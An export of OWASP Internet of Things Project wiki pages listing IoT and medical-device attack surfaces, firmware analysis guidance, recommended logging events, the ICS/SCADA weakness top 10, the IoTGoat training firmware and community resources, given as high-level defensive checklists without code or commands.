== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]] <br />
<br />
To get more information on getting started visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=249761OWASP Internet of Things Project2019-04-05T20:36:36Z<p>Aaron.guzman: /* Collaboration */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
